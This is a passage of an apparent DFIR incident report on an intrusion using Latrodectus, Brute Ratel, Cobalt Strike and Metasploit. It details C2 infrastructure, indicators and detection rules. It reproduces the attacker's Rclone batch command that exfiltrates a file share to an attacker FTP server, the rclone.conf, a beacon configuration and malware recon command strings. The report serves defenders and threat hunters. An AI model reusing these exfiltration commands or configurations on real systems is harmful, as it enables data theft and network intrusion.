    After the completion of the zero.exe executions, the threat actor attempted to establish a Metasploit reverse shell connection via a remote service on the same domain controller, to the C2 server at 217.196.98[.]61:4444.

    ee30d583b17f0e582e3c8902b47e19e6d90ba05ff8eb5fc1a0ef9f75091670b4
    Remote Service executing Metasploit shellcode
    7186d80ebe16dc302ec9c13aa1c9e75678d0d600b5e31738ef47b82ea9998d2a
    Running Metasploit shellcode in speakeasy

    RDP

    RDP was another Windows native tool used by the threat actor for lateral movment. The threat actor had extracted domain admin credentials as discussed in the Credential Access section, these credentials were used by the threat actor to login to two servers in the environment from the beachhead device via RDP, giving them interactive admin access to both devices.

    d5f8f05216f9a7f90e91bed4752bb04374ef79f088c391a04e2da29048e8a2bc

    While the logins originated from the beachhead host the threat actor leaked their source hostname during the authentication process.

    VPS2DAY-32220LE

    f35d582bfb525300784adf0f7c6ae746abcbb497ee6bffadb6c3ad1ff4b7fded

    The threat actor’s hostname implies that the infrastructure used by them was provided via a German hosting company VPS2DAY, which seems to be operating under the name Servinga since the vps2day domain redirects to Servinga.

    Command and Control

    Latrodectus/Backconnect

    The malware used to gain the initial foothold in the host was a Latrodectus Javascript file. The aforementioned file has been associated with high confidence to the Russian threat actor LUNAR SPIDER by Eclecticiq.

    It is important to note that although the sample contained only two domains, the injected explorer.exe communicated with three additional C2 servers. After further investigating the explorer’s memory, the following HTTPS request was identified towards one of the new domains:

    e29fac3bc065483ef92ea22335682574f5a2d5fbfcc293ab927b4f96bb47a369

    Upon decrypting the encrypted traffic sent by Latrodectus to the C2, the following information was identified:

    c0d7cba47bfd7e81cf4bea77f207aa05781ca2b74b5fcbfe73c72523a13a0f90

    C2 Domainhxxps[://]grasmertal[.]com/live/
    Campaign ID2221766521
    Latrodectus Version1.3
    RC4 Keyxkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8

    One extra functionality observed from the Latrodectus malware was Command and Control communication using the Backconnect protocol. More specifically, connections from explorer.exe and dllhost.exe were performed toward two different IP addresses. Additionally, these IP’s have been categorized with moderate confidence related to IcedId Backconnect, which commonly shares infrastructure with Latrodectus.

    9a84ebfcd2803c13de11f3239215559f1e3ca91c6c415118df2a9e8b1690e762

    Connections to the first IP started during the first day and then swapped to the second IP on the fifth day.

    2de6d73bff08bfa2f4b14661f2646aed4241a3a3b778ee976f2c85e115aba9ce

    As it was previously mentioned, utilizing Backconnect, various tasks were performed, such as browsing the file system, reading files, and uploading malware on the infected hosts.

    5ed9eb6eef4501763e26fba83950a848a65171aa2ecfbe87e73561fdab179c0a
    Backconnect traffic showing file upload
    DescriptionDomainIP AddressPortORGCountry
    Latrodectus C2workspacin[.]cloud104.21.16.155 or 172.67.213.171443CLOUDFLARENETUS
    Latrodectus C2illoskanawer[.]com173.255.204.62443Akamai Connected CloudUS
    Latrodectus C2grasmetral[.]com104.21.52.10 or 172.67.193.233443CLOUDFLARENET US
    Latrodectus C2jarkaairbo[.]com172.67.172.177 or 104.21.30.90443CLOUDFLARENET US
    Latrodectus C2scupolasta[.]store172.67.174.176 or 104.21.88.89443CLOUDFLARENET US
    Latrodectus MSI Second Stage91.194.11.64443TANGRAM-CANADA-INCCA
    Backconnect193.168.143.196443Zergrush SrlRO
    Backconnect185.93.221.12443SHOCK-1RO

    Brute Ratel

    The MSI file downloaded by the malicious Javascript contained a Brute Ratel DLL (upfilles.dll) that started C2 communication to a series of remote hosts. Of note is the use of the Tyk.io service which we have covered in prior reports.

    DomainIP AddressPortORGCountry
    anikvan[.]com95.164.68.73443Pq Hosting Plus S.r.l.DE
    altynbe[.]com138.124.183.215443Pq Hosting Plus S.r.l.US
    boriz400[.]com91.194.11.183443TANGRAM-CANADA-INCCA
    ridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]io54.165.22.33 or 35.153.92.249 or 34.233.204.207 or 54.159.36.188 or 35.172.8.165 or 54.175.181.104443AMAZON-AESUS
    uncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]io3.72.42.242 or 3.69.236.35 or 35.157.36.116 or 3.66.241.8 or 3.124.114.34 or 3.69.194.165443AMAZON-02DE

    On the fifth day, the threat actor deployed a second Brute Ratel badger, named wscadminui.dll, which communicated with the following domains:

    DomainIP AddressPortORGCountry
    erbolsan[.]com94.232.249.100443Psb Hosting Ltd NL
    erbolsan[.]com94.131.108.254443Pq Hosting Plus S.r.l.TR
    samderat200[.]com94.232.249.108443Psb Hosting Ltd NL
    samderat200[.]com45.150.65.85443Pq Hosting Plus S.r.l.US
    dauled[.]com195.123.225.161443Green Floid LLCBG
    kasymdev[.]com195.211.98.249443Green Floid LLCUS
    kasym500[.]com195.123.225.251443Green Floid LLCBG

    Lsassa

    Lsassa.exe was a .NET malware that was deployed on the fourth day. It attempted to communicate with its C2 server every 250 seconds. Additionally, each POST request contained the hostname of the infected workstation and the username of the compromised user, which were sent to the server.

    DomainIP AddressPortProtocolORGCountry
    cloudmeri[.]com162.0.209.121443HTTPS NAMECHEAP-NETUS

    Metasploit

    The psexec Metasploit module was utilized by the threat actor in order to perform lateral movement. During the analysis of the Metasploit shellcode, it was identified that it utilized the IP 217.196.98.61 to perform C2 communication.

    IP AddressPortProtocolORGCountry
    217.196.98.614444TCPAeza International LTDDE

    Although the Metasploit shellcode was executed, it was unable to establish a successful Command and Control connection, and the server rejected the connection.

    39afdf0ab91ad7b7cd72ca114f1b68962453999bf3f6545dca4ddc96e2292132

    Cobalt Strike

    The final Command and Control tool used was Cobalt Strike. In the C2 communication, both HTTPS and HTTP traffic were detected:

    BeaconDomainIP AddressPortProtocolORGCountry
    sys.dllavtechupdate[.]com206.206.123.209443HTTPSDatacamp LimitedUS
    cron801.dl_,system.dl_45.129.199.21480 or 8080HTTPBlueVPS OUEE
    31.13.248.15380 or 8080HTTPASNETBG

    To summarize the Command and Control activity and showcase its intensity over time, the following graphs were made:

    b839f83d6e659c51b769ebcd5d2c0ad29cd4d4be16731d7fe08f803b231bb75e

    Beaconing with Cobalt Strike

    b66deb8c876d17f64056a1c24a2fd80924b42e3c49b8e7ebe77411c6cfd88cea

    Beaconing without Cobalt Strike

    6a04d962239f70a786d128dd4af0962a5e6cc7e17f65a68fc369eeaf7d01734d

    Exfiltration

    Rclone

    From a Cobalt Strike beacon on a file share server, the threat actor dropped a data exfiltration toolkit in the ProgramData directory. This included a VBScript launcher (start.vbs), batch automation script (run.bat), renamed Rclone (sihosts.exe), and Rclone configuration file (rclone.conf). This toolkit automated the theft of sensitive data by syncing it to threat actor-controlled cloud storage using the legitimate Rclone utility.

    7c1187e885f5f72d9152cc01701a3dfa6def9eb008abfc54b4032f35fc644fd5
    Content of start.vbs

    Content of run.bat:

    C:\programdata\sihosts.exe copy "E:" ftp:REDACTED\<File Share Server>\E -q --exclude "*.{ai,bin,blf,bmp,cab,cat,cdf-ms,cdp,cfs,DAT,DAT*,DATA,db,db-shm,db-wal,dbg,dll,download,dwg,dxf,exe,*exe,feedsdb-ms,ico,idea,idx,indd,inf,ini,iso,jcp,jfm,jrs,js,json,jtx,lck,lnk,log,LOG*,LOG1,LOG2,lst,manifest,msi,nak,nvram,ost,pma,png,psd,pwd,rar,regtrans-ms,search-ms,searchconnector-ms,sys,tbacc*,tbres,toc,uca,val,vmdk,vmsd,vmx,vmxf,vol,vswp,wpl,zip}" --inplace --ignore-existing --auto-confirm --multi-thread-streams 45 --transfers 45 --min-size 1k --max-age 90M

    The threat actor dropped the Rclone configuration file (rclone.conf) twice on the file share server in quick succession. The first rclone.conf file creation occurred three minutes before the second one, with two executions occurring between them, hinting that there may have been a mistake in the first config file dropped by the threat actor. The first execution had a syntax error with specifying the drive to exfiltrate files from (threat actor added an extra colon to the drive), and the second execution showed that the threat actor had initially dropped the config file with an incorrect username added to it.

    084ae7b2f79c3b4f9e31b768ca96c33e9b2dea4f31456e1848dc0d23443746ca

    The FTP traffic shows that the username used was J0eBidenAbrabdy1aS3ha2 when it should have been J0eBidenAbrabdy1aS3ha2Yeami which was the username found in the rclone.conf file found on the infected device (the same password was used in both executions).

    [ftp]type = ftphost = 45.135.232.3user = J0eBidenAbrabdy1aS3ha2Yeami#port = 21pass = <REDACTED PASSWORD>#tls = false

    Exfiltration activity took place over 9 hours and 46 minutes.

    33018bbc45f36af5b09170033f357b445ff7ceef68036d691dbaccd38d973d2e

    Impact

    As discussed in the Exfiltration section, on the twentieth day, the threat actor successfully performed data exfiltration. Despite that, no further final actions on objectives were performed until they were evicted from the network.

    Timeline

    8865e319a64436d926054a4914272c908969604ca2d404ff9deff75f7f679bf6

    Diamond Model

    525a4e30d8e37c4e59154a1358d378c7bdd4aef75b85f3cf7c7d3ca8ef2f1c5f

    Indicators

    Atomic

    RDP Client NameVPS2DAY-32220LERclone configurationhost: 45.135.232.3user: J0eBidenAbrabdy1aS3ha2Yeamiuser: J0eBidenAbrabdy1aS3ha2Latrodectus Domainsworkspacin[.]cloudilloskanawer[.]comgrasmetral[.]comjarkaairbo[.]comscupolasta[.]storeBackconnect IP Addresses185.93.221.12193.168.143.196Lsassa Backdoor Domaincloudmeri[.]comLsassa Backdoor IP Addresses162.0.209.121Brute Ratel Domainsanikvan[.]comaltynbe[.]comboriz400[.]comridiculous-breakpoint-gw[.]aws-use1[.]cloud-ara[.]tyk[.]iouncertain-kitten-gw[.]aws-euc1[.]cloud-ara[.]tyk[.]ioerbolsan[.]comsamderat200[.]comdauled[.]comkasymdev[.]comkasym500[.]comBrute Ratel IP Addresses95.164.68.73138.124.183.21591.194.11.18394.232.249.10094.131.108.25494.232.249.108 45.150.65.85195.123.225.161195.211.98.249195.123.225.251Metasploit IP Addresses217.196.98.61Cobalt Strike Domainsavtechupdate[.]comCobalt Strike IP Addresses206.206.123.20945.129.199.21431.13.248.153

    Latrodectus Configuration

    Config:{ "Version": "1.3", "Direction": "4", "C2s": [ "hxxps://workspacin[.]cloud/live/", "hxxps://illoskanawer[.]com/live/" ], "RC4": "xkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8", "GroupID": "2221766521", "CampaignID": "Electrol"} Decrypted Strings:{"pid":"%d","proc":"%s","subproc": []}&desklinks=[*.*"%s"]&proclist=[{"pid":"%d","proc":"%s","subproc": []}/c ipconfig /allC:\Windows\System32\cmd.exe/c systeminfoC:\Windows\System32\cmd.exe/c nltest /domain_trustsC:\Windows\System32\cmd.exe/c nltest /domain_trusts /all_trustsC:\Windows\System32\cmd.exe/c net view /all /domainC:\Windows\System32\cmd.exe/c net view /allC:\Windows\System32\cmd.exe/c net group "Domain Admins" /domainC:\Windows\System32\cmd.exe/Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:ListC:\Windows\System32\wbem\wmic.exe/c net config workstationC:\Windows\System32\cmd.exe/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installedC:\Windows\System32\cmd.exe/c whoami /groupsC:\Windows\System32\cmd.exe&ipconfig=&systeminfo=&domain_trusts=&domain_trusts_all=&net_view_all_domain=&net_view_all=&net_group=&wmic=&net_config_ws=&net_wmic_av=&whoami_group=runnungfront/files/%d%s%sfiles/bp.dat%s\%d.dll%d.dat%s\%sinit -zzzz="%s\%s"ElectrolMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Content-Type: application/x-www-form-urlencodedPOSTGETCLEARURLURLSCOMMANDERRORxkxp7pKhnkQxUokR2dl00qsRa6Hx0xvQ31jTD7EwUqj4RXWtHwELbZFbOoqCnXl8counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%scounter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%scounter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%sABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/https://workspacin.cloud/live/https://illoskanawer.com/live/%s%d.dll%s%d.exeMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)<html><!DOCTYPE&mac=%02x:%02x;&computername=%s&domain=%sC:\WINDOWS\SYSTEM32\rundll32.exe %s,%sC:\WINDOWS\SYSTEM32\rundll32.exe %s12345&stiller=

    Cobalt Strike Beacon Configuration (system.dl_ | cron801.dl_)

    Version: 4.6Socket: 80Beacon Type: HTTPMaxGetSize: 2105681URL: hxxp://45.129.199[.]214/vodeo/wg01ck01Jitter: 49Encryption Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGcLYJG9miEP3Lp+FqQ74n9HNbqI/s4ZE5fg0PHR7voXFnSWgDr1g9wmLgG5B5YMIPXZXzJlFUwEYSPam58mUqy+87onjq1rXP6Dx7DXqZQ+3b6ZvfCs+5jrfxcHXRp8XD03AYmyKETAAQXsJd8ipoTIexVlLLPsWXyH9xZ/KC1wIDAQAB (RSA)HttpPostUri: /vodeo/vid_wg01ck01User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36MalleableC2Instructions: Remove 4338 chars from the end, Remove 4183 chars from the begςinning, NetBIOS decode 'A', XOR mask w/ random keyHTTPGetClient: mask, header Accept: application/xml, text/html, application/xhtml+xmlHTTPPostClient: mask, mask, header Accept: text/html, application/xhtml+xml, application/jsonHTTPGet_Verb: GETHTTPPost_Verb: POSTspawnto_x64: %windir%\sysnative\gpupdate.exespawnto_x86: %windir%\syswow64\gpupdate.exeProxy_Behavior: Use IE settingsWatermark: 987654321Jitter: 49ProcessInject_MinAllocation: 19836ProcessInject_AllocationMethod: NtMapViewOfSection

    Computed

    rustscan.exe9eaa8464110883a15115b68ffa1ecf7d5348970723b378c7cae35bb03d8736f8e5a9f0ac37471af00673af4080ee21bd248536147e450d2eff45e8701a95d1163a9d62felsassa.exe50abc42faa70062e20cd5e2a2e2b663397d72c8bbcf367be6bd5e80021e3bd3232ac309a203eda879dbdb128259cd658b22c9c21c66cbcfa1e2f39879c73b4dafb84c592run.batc8ea31665553cbca19b22863eea6ca2cba99cd73b74c64d6b1257b7db99814d1dc7d76b1411dfb067a984a244ff0c41887d4a09fbbcd8d562550f5d32d58a6a6256bd7b2start.vbs4b3e9c9e018659d1cf04daf82abe3b64333e1c5967a9a6c881c9573a3222bed6ada911c61a8ebf914ebea34402eecbf0985f05ae413663708d2fcc842fc27057ac5ec4edsys.dllad3c52316e0059c66bc1dd680cf9edad8dfa63c0bb611e18c8331ed5b89decf433ac394a100e03eb4e9dcdab6e06b2b26f800d47a21d338885f5dc1b42c56a32429c9168Cobalt Strikesystem.dl_ or cron801.dl_495363b0262b62dfc38d7bfb7b5541aa2d92890374904b49d3c54314d02b952e1a714e9977eede38abdc740f000596e374b6842902653aeafb6c63011388ebb22ec13e28BruteRatelupfilles.dllccb6d3cb020f56758622911ddd2f1fcb4a013f752c2bf84ca37e418175e0d9b6f61f636df4cb6b684ea097f867d406a978b3422bbf2ecfea39236bf3ab99340996b825deBruteRatelwscadminui.dlld7bd590b6c660716277383aa23cb0aa938999890b3a2c743e0abea1122649082a5fa12816c3b2490e99cd8397fb79d84a5638c1a0c4edb516a4b0047aa70b5811483db8fzero.exe91889658f1c8e1462f06f019b842f10933a6b39fbe8ec45afab14af88fd6fa8e96885bf136bc32becf287402bf0e9c918de22d886a74c501a33aa08dcb9be2f222fa6e24c356468.exeA2B6479A69B51AE555F695B243E4FDA123FFF588E3E5CC6678E1F77FAB9318D60F3AC55F8FB5034AEDF41F8C8C4C4022FDDE7DB3C70A5A7C7B5B4DEC7F6A57715C18A5BF

    Detections

    Network

    ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUNDET MALWARE Windows Microsoft Windows DOS prompt command Error not recognizedET POLICY Observed MSI DownloadThreatFox IcedID botnet C2 traffic (ip:port - confidence level: 60%) ThreatFox Unidentified 111 (Latrodectus) botnet C2 traffic (ip:port - confidence level: 75%) ThreatFox botnet C2 traffic (domain - confidence level: 100%)ET HUNTING ZIP file exfiltration over raw TCPET DROP Spamhaus DROP Listed Traffic Inbound group 5ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or InfectionET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check

    Sigma

    Search rules on detection.fyi or sigmasearchengine.com

    DFIR Private Rules:

    67eb826d-7745-416c-9674-525ef0dc7610 : Launching VNC Interactive Sessione652d235-b994-432e-b2f3-15a9cee381df : Domain Enumeration Using Netdom Queryf8a8998f-dfe9-4942-812c-f4e591653ced : MS-Settings Shell Command Hijacking1f959fda-4c54-4dad-9bca-4a5a65529772 : MSI Payload Executing Suspicious DLL Through Rundll32a566b9e8-0a5c-4128-b499-c7632915d5e2 : Suspicious Type Command Over Administrative Sharec42e8603-0311-4e4e-8923-4c1e8be9d78d : Suspicious Computer Machine Password Reset1b8ad6a1-35c3-4400-9678-e7d3e3b0acfd : DNS data export using dnscmd.exeb326e9ad-0d9b-43bf-8bd0-9620839c6f6b : Veeam Backup Credential Theft Detection

    Sigma Repo:

    d522eca2-2973-4391-a3e0-ef0374321dae : Abused Debug Privilege by Arbitrary Parent Processesd5601f8c-b26f-4ab0-9035-69e11a8d4ad2 : CobaltStrike Named Pipe85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 : CobaltStrike Named Pipe Patterns7b434893-c57d-4f41-908d-6a17bf1ae98f : Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location08249dc0-a28d-4555-8ba5-9255a198e08c : Outbound Network Connection Initiated By Script Interpretered74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools85b0b087-eddf-4a2b-b033-d771fa2b9775 : PowerShell Download and Execution Cradles3dfd06d2-eaf4-4532-9555-68aca59f57c4 : Process Execution From A Potentially Suspicious Folder8834e2f7-6b4b-4f09-8906-d2276470ee23 : PsExec/PAExec Escalation to LOCAL SYSTEM9a132afa-654e-11eb-ae93-0242ac130002 : PUA - AdFind Suspicious Executiondf55196f-f105-44d3-a675-e9dfb6cc2f2b : Renamed AdFind Execution5bb68627-3198-40ca-b458-49f973db8752 : Rundll32 Execution Without Parameters152f3630-77c1-4284-bcc0-4cc68ab2f6e7 : Shell Open Registry Keys Manipulation3b6ab547-8ec2-4991-b9d2-2b06702a48d7 : Suspicious PowerShell Download and Execute Pattern3c89a1e8-0fba-449e-8f1b-8409d6267ec8 : Suspicious Process Created Via Wmic.EXE5cc2cda8-f261-4d88-a2de-e9e193c86716 : Suspicious Processes Spawned by WinRMdcdbc940-0bff-46b2-95f3-2d73f848e33b : Suspicious Spool Service Child Process2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 : Suspicious SYSTEM User Process Creation1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folder

    Yara

    New Rules:

    https://github.com/The-DFIR-Report/Yara-Rules/blob/main/28761/28761.yar

YARA Forge:

61b951e4-0c27-59c0-8ea2-715b673fdcee : CAPE_Bruteratel5ae680b0-5ad2-5e82-87f8-b0af4fec18de : CAPE_Bruteratelconfig0ddc3e0a-c4ca-5342-b029-107ce1f2751e : CAPE_Bruteratelsyscall956b6736-b3ef-5974-b3dd-02d04336dbe8 : CAPE_Latrodectus_16bd6fbb4-6634-5b51-90f0-f24e48d69043 : EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt2e0925bc-6929-57fd-a204-d14352ab043b : MALPEDIA_Win_Brute_Ratel_C4_Auto1adbbac8-6bfc-5d06-9cad-1cba809f72a0 : MALPEDIA_Win_Cobalt_Strike_Auto02322cd8-96f0-5b56-94f1-88df3945f27c : MALPEDIA_Win_Latrodectus_Auto042a598d-66fa-4994-a793-228355abd5dd : SEKOIA_Latrodectus_Br4_Js_Dropper29076cf5-f391-42f2-918f-e1c929bd368d : SEKOIA_Latrodectus_Exportsd5b53d68-55f9-5837-9b0c-e7be2f3bd072 : SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator63b71eef-0af5-5765-b957-ccdc9dde053b : SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_4_2_Decryptaf558aa2-a3dc-5a7a-bc74-42bb2246091c : SIGNATURE_BASE_HKTL_Cobaltstrike_Beacon_Stringsd396ab0e-b584-5a7c-8627-5f318a20f9dd : SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22a7dae4c7-672e-58fb-8542-90fa90d991a4 : TRELLIX_ARC_MALW_Cobaltrike113ba304-261f-5c59-bc56-57515c239b6d : VOLEXITY_Trojan_Win_Cobaltstrike

 Elastic Protection Artifacts:

4110d879-8d36-4004-858d-e62400948920 : Windows_Trojan_BruteRatel_4110d8795b12cbab-c64c-4895-a186-b940bf4a8620 : Windows_Trojan_BruteRatel_5b12cbab644ac114-cc66-443e-9dd0-a591be99a86c : Windows_Trojan_BruteRatel_644ac1143dc22d14-a2f4-49cd-a3a8-3f071eddf028 : Windows_Trojan_CobaltStrike_3dc22d14663fc95d-2472-4d52-ad75-c5d86cfc885f : Windows_Trojan_CobaltStrike_663fc95d8d5963a2-54a9-4705-9f34-0d5f8e6345a2 : Windows_Trojan_CobaltStrike_8d5963a2b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca : Windows_Trojan_CobaltStrike_b54b94ac841ff697-f389-497a-b813-3b9e19cba26e : Windows_Trojan_Latrodectus_841ff697

MITRE ATT&CK

6ed27efc71ac88552af168e57fbace2f3dd0c54450282bd184e7fbc57ecd6104

Access Token Manipulation - T1134Archive via Utility - T1560.001Bypass User Account Control - T1548.002Credentials from Web Browsers - T1555.003Credentials In Files - T1552.001Domain Accounts - T1078.002Domain Account - T1087.002Domain Groups - T1069.002Domain Trust Discovery - T1482Drive-by Compromise - T1189Encrypted/Encoded File - T1027.013Exfiltration Over Alternative Protocol - T1048Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003Exploitation of Remote Services - T1210File and Directory Discovery - T1083File Deletion - T1070.004Ingress Tool Transfer - T1105JavaScript - T1059.007Junk Code Insertion - T1027.016Lateral Tool Transfer - T1570Local Account - T1087.001Local Groups - T1069.001LSASS Memory - T1003.001Malicious File - T1204.002Masquerading - T1036Network Service Discovery - T1046Network Share Discovery - T1135Non-Standard Port - T1571PowerShell - T1059.001Process Injection - T1055Registry Run Keys / Startup Folder - T1547.001Remote Desktop Protocol - T1021.001Remote System Discovery - T1018Rundll32 - T1218.011Scheduled Task - T1053.005Security Software Discovery - T1518.001Service Execution - T1569.002SMB/Windows Admin Shares - T1021.002System Information Discovery - T1082System Owner/User Discovery - T1033Web Protocols - T1071.001Windows Command Shell - T1059.003Windows File and Directory Permissions Modification - T1222.001Windows Management Instrumentation - T1047

Internal case #PR37865 #TB28761


Original Source


A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

To keep up to date follow us on the below channels.